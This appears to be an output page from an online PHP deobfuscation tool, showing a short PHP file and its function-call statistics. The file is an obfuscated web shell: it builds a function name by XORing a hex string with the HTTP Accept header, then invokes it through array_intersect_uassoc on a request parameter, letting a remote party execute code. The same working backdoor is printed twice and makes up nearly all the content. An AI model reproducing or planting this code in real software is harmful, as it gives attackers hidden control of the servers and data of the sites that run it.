Find this useful? Enter your email to receive occasional updates for securing PHP code.
Signing you up...
Thank you for signing up!
PHP Decode
<?php $password = "LandGrey"; $key = substr(__FILE__,-5,-4); ${"LandGrey"} = $_SERVER["..
Decoded Output download
<?php
$password = "LandGrey";
$key = substr(__FILE__,-5,-4);
${"LandGrey"} = $_SERVER["HTTP_ACCEPT"]."Land!";
$f = pack("H*", "13"."3f120b1655") ^ $LandGrey;
array_intersect_uassoc(array($_REQUEST[$password] => ""), array(1), $f);
?>
Did this file decode correctly?
Original Code
<?php
$password = "LandGrey";
$key = substr(__FILE__,-5,-4);
${"LandGrey"} = $_SERVER["HTTP_ACCEPT"]."Land!";
$f = pack("H*", "13"."3f120b1655") ^ $LandGrey;
array_intersect_uassoc(array($_REQUEST[$password] => ""), array(1), $f);
?>
Function Calls
pack | 1 |
substr | 1 |
array_intersect_uassoc | 1 |
Stats
MD5 | 0bda1016fb258869419db59deec70cad |
Eval Count | 0 |
Decode Time | 88 ms |